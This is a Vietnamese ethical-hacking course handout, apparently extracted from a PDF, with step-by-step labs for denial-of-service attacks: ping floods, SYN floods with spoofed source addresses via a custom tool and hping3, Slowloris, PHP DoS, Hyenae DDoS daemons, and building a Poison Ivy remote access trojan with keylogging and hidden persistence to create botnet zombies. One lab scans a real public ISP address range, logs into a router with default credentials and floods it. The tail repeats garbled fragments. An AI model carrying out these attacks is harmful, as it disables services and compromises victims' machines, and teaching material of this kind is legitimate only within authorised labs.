[Type text] Athena Ethical Hacker Lab DoS DDoS Module Ping of Dealth SYN Flood Hping3 SYN Flood PHP DoS Apache DoS Slowloris Poison Ivy Hyenae LAB DOS DDoS attack Ping of Dealth Attack - Sơ đồ lab Router 234 254 192.168.1.0/24 Attacker - Trong hệ điều hành Window để ta sử dụng lệnh “ping IP -t -l 5000” để ping destination cách liên tục - Nếu bạn muốn mở lúc 20 cửa sổ Window ping ta kết hợp với câu lệnh For sau “ For /L %i in (1,1,20) start ping 192.168.1.254 -t -l 36000 ” chương trình mở lúc 20 cửa sổ window ping liên tục đến IP 192.168.1.254 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Syn Flood Attack - Sơ đồ lab sau Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Router 234 254 192.168.1.0/24 Attacker - 118.68.26.1 lab ta thử thực SYN Flood Attack vào router ADSL Đầu tiên ta xác định xem có router ADSL mở port 80 công cụ Nmap Giả sử IP Public thời 118.68.226.103, ta sử dụng câu lệnh “nmap –sS –p 80 118.68.226.1/24 ” để scan Ta thực scan xuất file scan_adsl.txt Kiểm tra nội dung file scan_adsl.txt chọn IP để ta làm lab tiếp tục Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Ví dụ đoạn file scan_adsl.txt có nội dung bên nghĩa IP 118.68.226.7 mở port 80 Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7) Host is up (0.037s latency) PORT STATE SERVICE 80/tcp open http - Ta vào trình duyệt web để kiểm tra IP trang web IP thử nhập vào username: admin password admin mặc định - Ta thực syn flood attack vào port 80 router ADSL cơng cụ syn-floodalpha1.tar.gz Ta thực q trình cài đặt giống bên root@bt:~/Desktop# ls scan_adsl.txt syn-flood-alpha1.tar.gz root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz syn-flood/ syn-flood/Makefile Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân syn-flood/gpl.txt syn-flood/syn-flood.cpp root@bt:~/Desktop# cd syn-flood root@bt:~/Desktop/syn-flood# ls gpl.txt Makefile syn-flood.cpp root@bt:~/Desktop/syn-flood# make g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp g++ -o syn-flood syn-flood.o - Ta thực q trình cơng câu lệnh bên để gửi 100000 gói tin syn root@bt:~/Desktop/syn-flood# /syn-flood Usage: /syn-flood ip IP port PORT [verbose] -h help Display this usage information -i ip Destination IP address -p port Destination port -n num Number of packets to send -v verbose Print verbose messages root@bt:~/Desktop/syn-flood# /syn-flood -i 118.68.226.7 -p 80 -n 1000000 Sent 1000000 packets - Ta sử dụng chương trình Wireshark để phân tích q trình hoạt động cơng cụ thấy chương trình gửi 100000 gói tin TCP SYN đến victim router adsl với IP 118.68.226.7 với source IP IP giả khác Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Sử Dụng Hping3 thực Syn Flood Attack - Sơ đồ lab Attacker 100 Router 254 101 - 192.168.1.0/24 Máy victim có IP 192.168.1.101/24 ( Window XP ) máy attacker có IP 192.168.1.100/24 ( Back Track ) Đầu tiên ta thực trình scan port open Victim công cụ Nmap root@bt:~# nmap -sS 192.168.1.101 PORT STATE SERVICE 139/tcp open netbios-ssn Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân 445/tcp open microsoft-ds MAC Address: 00:0C:29:9F:87:19 (VMware) - Ta sử dụng hping3 SYN Flood vào port mở 445 root@bt:~#man hping3 => Kiểm tra thông số hping3 root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 => thực SYN FLOOD vào victim có IP 192.168.1.101 -a giả dạng IP 192.168.1.254 -p port 445 -S thực Syn Flood attack -i interval wait (uX for X microseconds, for example -i u1000) fast alias for -i u10000 (10 packets for second) faster alias for -i u1000 (100 packets for second) flood sent packets as fast as possible Don't show replies root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 –c 100000 -c nghĩa count, ta gửi 100000 đến victim - Tại máy Victim bị SYN Flood ta kiểm tra trạng thái kết nối lệnh “netstat -ano” thấy xuất nhiều kết nối SYN Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân PHP DoS - Ta thực upload source PHP DoS lên Web Server, sử dụng server để công server khác - Đầu tiên ta thực việc upload source vào chương trình PHP DoS vào Web Server Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Restart lại dịch vụ apache - Ta sử dụng trình duyệt web kết vào trang PHP DoS thực cơng vào victim - Sau attack xong chương trình thống kê lại cho ta số lượng gói tin – Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Thực DoS vào victim câu lệnh “perl /slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5”, ta nên xem thêm phần help chương trình để biết thêm ý nghĩa biến Sử Dụng Poison Ivy tạo Botnet Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Đầu tiên ta cần phải tạo file Remote Access Trojan gửi file đến victim Sau install, máy victim trở thành zombie bị điều khiển attacker Decompress chương trình thực thi file “Poison Ivy” - Click “I Agree”, Sau chọn mục “New Server” - Tiếp tục ta chọn tạo New Profile Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Ta nhập vào thơng số: o IP máy đóng vai trò server để zombie connect port tương ứng Mặc định chương trình dùng port 3460 Mặt khác ta tạo nhiều profile khác nhau, profile tương ứng với port máy attacker o Nhập vào mục ID: ví dụ server_test o Password để đăng nhập sử password dạng static sử dụng “dynamic key” o Tiếp tục click Next góc phải hình Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Tiếp tục chương trình chuyển qua mục “Install” Ta cần nhập vào thông số sau o HKLM/Run Name: o ActiveX Key Name o Copy File: ta nhập vào với tên có dạng exe dạng scr o Ta chọn dạng Copy to Alternate Data Stream để ẩn file Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Click Next chương trình chuyển phần Advance Ta chọn tính Key logger, Format dạng PE… Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Click Next chương trình chuyển qua mục “Build”, ta chuyển icon file zombie, Click Generate , xác định vị trí lưu trữ, tên file zombie… Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Ở vị trí máy attacker, ta sử dụng tính New Client để quản lý kết nối từ zombie, chọn vào tên Profile mà attacker tạo - Chương trình yêu cầu ta phải nhập vào PASSWORD ta phải LOAD KEY tùy thuộc vào phương thức password cấu hình - Tiếp tục ta thực cơng việc phát tán file zombie dos_server.exe Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Sau client kích hoạt file dos_server.exe, ta kiểm tra kết nối ta thấy xuất kết nối - Ta Double-click vào dòng biểu thị cho client, để hiển thị đầy đủ tác vụ mà attacker làm zombie ( tùy thuộc vào cấu hình ban đầu ) Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ví dụ ta chọn Remote Shell Active để có giao diện dòng lệnh zombie Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Dos DdoS cơng cụ Hyenae - Download chương trình http://sourceforge.net/projects/hyenae/files/ - Chương trình cho phép ta thực công DoS DdoS Để thực DdoS ta cần phải install Hyenae daemon máy, sau sử dụng Hyenae Front End ( giao diện ) Hyenae ( dòng lệnh để điều khiển ) - Trong lab ta install Hyenae daemon máy Window server 2003 (192.168.1.100/24) sử dụng Window XP (192.168.1.101/24) làm client điều khiển Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Đầu tiên ta cấu hình hyenaed kiểm tra card máy tính C:\>hyenaed.exe -l  Để kiểm tra card mạng nhận chương trình  Giả sử chương trình nhận card Intel Pro/1000 MT nhận số - Cấu hình hyenaed.exe lắng nghe máy tính server 2003 C:\>hyenaed.exe -I -a 192.168.1.100 –p 8888 –u 10000 –k 123abc!!! -I: card kết nối vào -a: bind với IP máy hoạt động chương trình hyenaed -p: port -u: số lượng packet gửi cho lần kết nối Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Sử dụng hyenae.exe dạng front end để kết nối Tuy nhiên chương trình bị lỗi Ta sử dụng câu lệnh bên thực thi giao diện dòng lệnh Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Chú ý: thêm vào dấu “+” kết nối 192.168.1.15@8888+123abc!!! Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân ... ATHENA.GV: Lê Đình Nhân Dos DdoS cơng cụ Hyenae - Download chương trình http://sourceforge.net/projects/hyenae/files/ - Chương trình cho phép ta thực công DoS DdoS Để thực DdoS ta cần phải install...LAB DOS DDoS attack Ping of Dealth Attack - Sơ đồ lab Router 234 254 192.168.1.0/24 Attacker - Trong hệ điều hành Window để ta sử dụng lệnh “ping IP -t -l 50 00” để ping destination... hping3 root@bt:~# hping3 -a 192.168.1. 254 -p 4 45 192.168.1.101 -S -i u100 => thực SYN FLOOD vào victim có IP 192.168.1.101 -a giả dạng IP 192.168.1. 254 -p port 4 45 -S thực Syn Flood attack -i interval